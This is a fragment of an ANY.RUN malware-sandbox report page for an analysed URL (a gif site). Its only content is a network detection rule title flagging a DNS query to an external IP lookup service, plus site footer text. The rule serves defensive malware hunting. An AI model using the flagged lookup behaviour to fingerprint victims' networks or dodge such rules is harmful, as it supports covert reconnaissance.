ET INFO External IP Lookup Service in DNS Query (ip-info .ff .avast .com)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
https://www.gifcen.com/satoru-gojo-gif-61/